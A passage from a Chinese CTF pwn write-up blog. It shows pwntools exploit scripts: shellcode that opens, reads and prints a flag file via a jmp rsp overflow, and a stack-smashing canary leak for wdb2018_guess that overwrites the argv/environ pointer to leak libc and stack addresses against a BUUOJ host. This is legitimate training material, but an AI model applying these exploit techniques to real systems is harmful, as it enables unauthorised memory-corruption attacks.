mov rdx, 0x400
xor rax, rax
syscall
jmp rsp
'''
shellcode2 = '''
lea rax, [rsp-0x30]
jmp rax
'''
payload = asm(shellcode)
payload = payload.ljust(offset+3,b'a') + b'flag\0' + p64(jmprsp) + asm(shellcode2)
p.send(payload)
pause()
shellcode = '''
lea rdi, [rsp-0xd]
mov rax, 2
xor rdx, rdx
xor rsi, rsi
syscall
mov rdi, 3
lea rsi, [rsp + 0xff]
mov rdx, 0x400
xor rax, rax
syscall
mov rdi, 1
mov rax, 1
syscall
'''
p.send(asm(shellcode))
p.interactive()

# axb_2019_brop64

# **wdb2018_guess

fork, stack smashing

这题创建了 3 个子程序,并且存在 canary 保护。由于不是无限 fork 子程序,所以不能使用传统的 fork 爆破。

在 libc-2.23 版本中,stack smashing 报错时,会输出 environ 变量所指的文件名。而该变量储存在栈上。所以可以通过溢出将该变量覆盖为 ` 函数 got 表地址,以此在栈溢出报错时可以泄露 libc 地址。

随后可以查找 libc 里的 __environ 变量,该变量储存着栈地址。

最后,计算偏移,求出程序在栈上储存 flag 的地址。依法炮制,将 flag 输出。

#!/usr/bin/python3
from pwn import *
from LibcSearcher import LibcSearcher
context(os='linux', arch='amd64', log_level='debug')
filename = 'GUESS'
libcfile = '/home/walt/share/pwn/libc/libc6_2.23-0ubuntu10_amd64/libc/lib/x86_64-linux-gnu/libc-2.23.so'
libc = ELF(libcfile)
mode = int(sys.argv[1]) if len(sys.argv)>1 else 0
p = process("./"+filename+'_pe') if mode else remote('node4.buuoj.cn', 28289)
e = ELF('./'+filename) if mode else ELF('./'+filename+'_pe') 
if mode==2:
    gdb.attach(p, 'b read')
    
def suspend():
    if mode == 2:
        pause()
    else:
        sleep(0.1)
main_a = 0x400B0D
lsm_g = e.got['__libc_start_main']
rdi = 0x0400c13
rsi_r15 = 0x0400c11
ret = 0x0400791
environ = 0x7ffc91e90808
buf = 0x7ffc91e906e0
ind = environ-buf
payload = ind * b'a' + p64(lsm_g) 
p.sendlineafter(b"Please type your guessing flag", payload)
p.recvuntil(b'***: ')
lsm_a = u64(p.recvuntil(b' ')[:-1].ljust(8,b'\0'))
print('the true address of __libc_start_main is %#x'%lsm_a)
obj = LibcSearcher('__libc_start_main',lsm_a)
libcbase = lsm_a - obj.dump('__libc_start_main')
evr = libcbase + obj.dump('__environ')
payload = ind * b'a' + p64(evr)
p.sendlineafter(b"Please type your guessing flag", payload)
p.recvuntil(b'***: ')
stackadd = u64(p.recvuntil(b' ')[:-1].ljust(8,b'\0'))
flag = stackadd + 0x9960 - 0x9ac8
payload = ind * b'a' + p64(flag)
p.sendlineafter(b"Please type your guessing flag", payload)
p.recvuntil(b'***: ')
print(p.recvuntil(b'}'))
p.interactive()
p.close()
更新于

请我喝[茶]~( ̄▽ ̄)~*

Walt CSZ 微信支付

微信支付

Walt CSZ 支付宝

支付宝